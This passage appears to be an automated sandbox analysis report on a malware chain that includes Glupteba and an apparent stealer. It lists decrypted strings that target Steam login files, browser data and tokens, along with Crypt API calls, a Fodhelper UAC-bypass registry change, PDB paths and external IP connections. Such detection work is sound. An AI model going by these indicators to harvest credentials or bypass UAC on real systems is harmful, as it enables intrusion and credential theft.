Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: config.vdf
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: 00000001
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: 00000002
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: 00000003
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: 00000004
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: token:
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: Software\Valve\Steam
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: SteamPath
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: DialogConfig.vdf
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: DialogConfigOverlay*.vdf
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: libraryfolders.vdf
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: loginusers.vdf
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: sqlite3.dll
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: browsers
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: https
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: Content-Disposition: form-data; name="
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: build
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: token
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: message
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
Source: 30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	String decryptor: screenshot.jpg

Source: C:\Users\user\AppData\Local\Temp\907.exe	Code function: 6_2_6F8CDEE0 CryptReleaseContext,	6_2_6F8CDEE0
Source: C:\Users\user\AppData\Local\Temp\907.exe	Code function: 6_2_6F8CDE00 CryptGenRandom,__CxxThrowException@8,	6_2_6F8CDE00
Source: C:\Users\user\AppData\Local\Temp\907.exe	Code function: 6_2_6F8CDD20 CryptReleaseContext,	6_2_6F8CDD20
Source: C:\Users\user\AppData\Local\Temp\907.exe	Code function: 6_2_6F8CDBB0 CryptAcquireContextA,CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptAcquireContextA,SetLastError,__CxxThrowException@8,	6_2_6F8CDBB0
Source: C:\Users\user\AppData\Local\Temp\907.exe	Code function: 6_2_6F8CD9D0 CryptAcquireContextA,GetLastError,	6_2_6F8CD9D0
Source: C:\Users\user\AppData\Local\Temp\907.exe	Code function: 6_2_6F8CD7D5 CryptReleaseContext,	6_2_6F8CD7D5
Source: C:\Users\user\AppData\Local\Temp\907.exe	Code function: 6_2_6F8CD7F0 CryptReleaseContext,	6_2_6F8CD7F0
Source: C:\Users\user\AppData\Local\Temp\907.exe	Code function: 6_2_6F8F35E0 CryptReleaseContext,	6_2_6F8F35E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 21_2_0042609B CryptUnprotectData,	21_2_0042609B

Privilege Escalation

UAC bypass detected (Fodhelper)

Source: C:\Users\user\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe	Registry value created: DelegateExecute
Source: C:\Users\user\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe	Registry value created: NULL "C:\Users\user\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

Bitcoin Miner

Yara detected Glupteba

Source: Yara match	File source: 15.2.31839b57a4f11171d6abc8bbc4451ee4.exe.2dd0e67.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.31839b57a4f11171d6abc8bbc4451ee4.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.3.31839b57a4f11171d6abc8bbc4451ee4.exe.36c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000002.2342467116.0000000000843000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.2047877802.0000000003B02000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2430493808.0000000003213000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 31839b57a4f11171d6abc8bbc4451ee4.exe PID: 6508, type: MEMORYSTR

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

Unpacked PE file: 15.2.31839b57a4f11171d6abc8bbc4451ee4.exe.400000.6.unpack

Source: W73PCbSH71.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: C:\Users\user\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Source: unknown	HTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.217.163.105:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.176.11:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.176.11:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.176.11:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.176.11:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.176.11:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.176.11:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.176.11:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.176.11:443 -> 192.168.2.4:49754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.176.11:443 -> 192.168.2.4:49758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.176.11:443 -> 192.168.2.4:49780 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.176.11:443 -> 192.168.2.4:49781 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.176.11:443 -> 192.168.2.4:49787 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.176.11:443 -> 192.168.2.4:49791 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.176.11:443 -> 192.168.2.4:49794 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.176.11:443 -> 192.168.2.4:49795 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.176.11:443 -> 192.168.2.4:49801 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.176.11:443 -> 192.168.2.4:49808 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.176.11:443 -> 192.168.2.4:49812 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.176.11:443 -> 192.168.2.4:49816 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.176.11:443 -> 192.168.2.4:49818 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.176.11:443 -> 192.168.2.4:49826 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.176.11:443 -> 192.168.2.4:49830 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.176.11:443 -> 192.168.2.4:49834 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.176.11:443 -> 192.168.2.4:49839 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.176.11:443 -> 192.168.2.4:49840 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.176.11:443 -> 192.168.2.4:49842 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.176.11:443 -> 192.168.2.4:49844 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.176.11:443 -> 192.168.2.4:49848 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.176.11:443 -> 192.168.2.4:49849 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.176.11:443 -> 192.168.2.4:49850 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 194.15.112.248:443 -> 192.168.2.4:49860 version: TLS 1.2

Source:	Binary string: kernel32.pdbUGP source: dialer.exe, 00000022.00000003.2201377378.000001B8F63D0000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: Loader.pdb source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000843000.00000040.00000001.01000000.0000000C.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2047877802.0000000003B02000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2430493808.0000000003213000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: EfiGuardDxe.pdb7 source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2416198321.00000000029D5000.00000040.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\MyProjects\gitlab\ILProtector\ILProtector\Output2010\Win32\Release\Protect32.pdb source: 907.exe, 00000006.00000002.1919407201.0000000004AFF000.00000004.00000800.00020000.00000000.sdmp, 907.exe, 00000006.00000002.1930274507.000000006F8F4000.00000002.00000001.01000000.00000009.sdmp, 907.exe, 00000006.00000002.1919407201.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, 4BEF.exe, 0000001C.00000002.2463972164.0000000006FD4000.00000004.00000800.00020000.00000000.sdmp, 4BEF.exe, 0000001C.00000002.2618731211.000000006991D000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: Unrecognized pdb formatThis error indicates attempting to access a .pdb file with source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2047877802.0000000003D8B000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000ACD000.00000040.00000001.01000000.0000000C.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2430493808.000000000349C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: A connection with the server could not be establishedAn extended error was returned from the WinHttp serverThe .pdb file is probably no longer indexed in the symbol server share location. source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2047877802.0000000003D8B000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000ACD000.00000040.00000001.01000000.0000000C.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2430493808.000000000349C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\zinazibemur\wemotugiw_cudeyatofo88\gajore\fozomupa96\m.pdb source: nsi4BEF.tmp.exe, 0000001E.00000000.2093402558.0000000000424000.00000002.00000001.01000000.0000001A.sdmp
Source:	Binary string: Age does not matchThe module age and .pdb age do not match. source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2047877802.0000000003D8B000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000ACD000.00000040.00000001.01000000.0000000C.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2430493808.000000000349C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\rosicena2\regitel_vasecivi\yiyimuk hef\faxezok.pdb source: 5A58.exe, 0000001F.00000003.2159199325.000000000096E000.00000004.00000020.00020000.00000000.sdmp, 5A58.exe, 0000001F.00000000.2111278135.000000000044D000.00000002.00000001.01000000.0000001B.sdmp
Source:	Binary string: symsrv.pdb source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2047877802.0000000003F38000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2430493808.0000000003649000.00000040.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000C7A000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: ntdll.pdbUGP source: dialer.exe, 00000022.00000003.2190774257.000001B8F6500000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: Cvinfo is corruptThe .pdb file contains a corrupted debug codeview information. source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2047877802.0000000003D8B000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000ACD000.00000040.00000001.01000000.0000000C.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2430493808.000000000349C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: System.ServiceModel.pdb source: RegSvcs.exe, 00000008.00000002.3182406330.0000000000F42000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Downloading symbols for [%s] %ssrvsymsrvhttp://https://_bad_pdb_file.pdb source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2047877802.0000000003D8B000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000ACD000.00000040.00000001.01000000.0000000C.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2430493808.000000000349C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\rosicena2\regitel_vasecivi\yiyimuk hef\faxezok.pdb`C source: 5A58.exe, 0000001F.00000003.2159199325.000000000096E000.00000004.00000020.00020000.00000000.sdmp, 5A58.exe, 0000001F.00000000.2111278135.000000000044D000.00000002.00000001.01000000.0000001B.sdmp
Source:	Binary string: The symbol server has never indexed any version of this symbol fileNo version of the .pdb file with the given name has ever been registered. source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2047877802.0000000003D8B000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000ACD000.00000040.00000001.01000000.0000000C.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2430493808.000000000349C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: PDB not foundUnable to locate the .pdb file in any of the symbol search path locations. source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2047877802.0000000003D8B000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000ACD000.00000040.00000001.01000000.0000000C.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2430493808.000000000349C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: mentorship_and_software_support.pdb source: 907.exe, 00000006.00000000.1906824742.0000000000DD1000.00000002.00000001.01000000.00000006.sdmp
Source:	Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\Release\Winmon.pdb source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000843000.00000040.00000001.01000000.0000000C.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2047877802.0000000003B02000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2430493808.0000000003213000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: kernelbase.pdbUGP source: dialer.exe, 00000022.00000003.2209743343.000001B8F65F0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000022.00000003.2203687364.000001B8F6310000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: C:\vbox\branch\w64-1.6\out\win.amd64\release\obj\src\VBox\HostDrivers\VBoxDrv\VBoxDrv.pdb source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000843000.00000040.00000001.01000000.0000000C.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2047877802.0000000003B02000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2430493808.0000000003213000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: Drive not readyThis error indicates a .pdb file related failure. source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2047877802.0000000003D8B000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000ACD000.00000040.00000001.01000000.0000000C.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2430493808.000000000349C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\x64\Release\Winmon.pdb source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000843000.00000040.00000001.01000000.0000000C.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2047877802.0000000003B02000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2430493808.0000000003213000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: Error while loading symbolsUnable to locate the .pdb file in any of the symbol search source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2047877802.0000000003D8B000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000ACD000.00000040.00000001.01000000.0000000C.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2430493808.000000000349C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: zzz_AsmCodeRange_*FrameDatainvalid string positionstring too long.pdb source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2047877802.0000000003D8B000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000ACD000.00000040.00000001.01000000.0000000C.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2430493808.000000000349C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: Pdb read access deniedYou may be attempting to access a .pdb file with read-only attributes source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2047877802.0000000003D8B000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000ACD000.00000040.00000001.01000000.0000000C.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2430493808.000000000349C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: Unable to locate the .pdb file in this location source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2047877802.0000000003D8B000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000ACD000.00000040.00000001.01000000.0000000C.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2430493808.000000000349C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\x64\Release\WinmonFS.pdb source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000843000.00000040.00000001.01000000.0000000C.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2047877802.0000000003B02000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2430493808.0000000003213000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: The module signature does not match with .pdb signature. source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2047877802.0000000003D8B000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000ACD000.00000040.00000001.01000000.0000000C.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2430493808.000000000349C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: .pdb.dbg source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2047877802.0000000003D8B000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000ACD000.00000040.00000001.01000000.0000000C.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2430493808.000000000349C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: '(EfiGuardDxe.pdbx source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2047877802.0000000003D8B000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000ACD000.00000040.00000001.01000000.0000000C.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2430493808.000000000349C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: symsrv.pdbGCTL source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2047877802.0000000003F38000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2430493808.0000000003649000.00000040.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000C7A000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: ntdll.pdb source: dialer.exe, 00000022.00000003.2190774257.000001B8F6500000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: C:\Users\admin\source\repos\driver-process-monitor-master\Release\WinmonProcessMonitor.pdb source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000843000.00000040.00000001.01000000.0000000C.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2047877802.0000000003B02000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2430493808.0000000003213000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: kernel32.pdb source: dialer.exe, 00000022.00000003.2201377378.000001B8F63D0000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: or you do not have access permission to the .pdb location. source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2047877802.0000000003D8B000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000ACD000.00000040.00000001.01000000.0000000C.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2430493808.000000000349C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\Release\WinmonFS.pdb source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000843000.00000040.00000001.01000000.0000000C.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2047877802.0000000003B02000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2430493808.0000000003213000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: An Exception happened while downloading the module .pdbPlease open a bug if this is a consistent repro. source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2047877802.0000000003D8B000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000ACD000.00000040.00000001.01000000.0000000C.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2430493808.000000000349C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: EfiGuardDxe.pdb source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2047877802.0000000003D8B000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000ACD000.00000040.00000001.01000000.0000000C.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2430493808.000000000349C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\admin\source\repos\driver-process-monitor-master\x64\Release\WinmonProcessMonitor.pdb source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000843000.00000040.00000001.01000000.0000000C.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2047877802.0000000003B02000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2430493808.0000000003213000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb source: RegSvcs.exe, 00000008.00000002.3182406330.0000000000EE6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Serialize.pdb source: 3FF8.exe, 00000012.00000000.2046476160.0000000000ED2000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: c:\MyProjects\gitlab\ILProtector\ILProtector\Output2010\x64\Release\Protect64.pdb source: 907.exe, 00000006.00000002.1919407201.0000000004BBC000.00000004.00000800.00020000.00000000.sdmp, 907.exe, 00000006.00000002.1919407201.0000000004A31000.00000004.00000800.00020000.00000000.sdmp, 4BEF.exe, 0000001C.00000002.2463972164.0000000006F06000.00000004.00000800.00020000.00000000.sdmp, 4BEF.exe, 0000001C.00000002.2463972164.0000000007091000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: Signature does not matchThe module signature does not match with .pdb signature source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2047877802.0000000003D8B000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000ACD000.00000040.00000001.01000000.0000000C.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2430493808.000000000349C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: dbghelp.pdb source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2047877802.0000000003D8B000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000ACD000.00000040.00000001.01000000.0000000C.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2430493808.000000000349C000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: kernelbase.pdb source: dialer.exe, 00000022.00000003.2209743343.000001B8F65F0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000022.00000003.2203687364.000001B8F6310000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: dbghelp.pdbGCTL source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2047877802.0000000003D8B000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000ACD000.00000040.00000001.01000000.0000000C.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2430493808.000000000349C000.00000040.00001000.00020000.00000000.sdmp

Spreading

Infects executable files (exe, dll, sys, html)

Source: C:\Windows\explorer.exe

System file written: C:\Users\user\AppData\Local\Temp\3613.exe

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\InstallSetup8.exe	Code function: 10_2_00405C63 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	10_2_00405C63
Source: C:\Users\user\AppData\Local\Temp\InstallSetup8.exe	Code function: 10_2_00402910 FindFirstFileW,	10_2_00402910
Source: C:\Users\user\AppData\Local\Temp\InstallSetup8.exe	Code function: 10_2_004068B4 FindFirstFileW,FindClose,	10_2_004068B4
Source: C:\Users\user\AppData\Local\Temp\InstallSetup8.exe	Code function: 13_2_00405C63 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	13_2_00405C63
Source: C:\Users\user\AppData\Local\Temp\InstallSetup8.exe	Code function: 13_2_004068B4 FindFirstFileW,FindClose,	13_2_004068B4
Source: C:\Users\user\AppData\Local\Temp\InstallSetup8.exe	Code function: 13_2_00402910 FindFirstFileW,	13_2_00402910
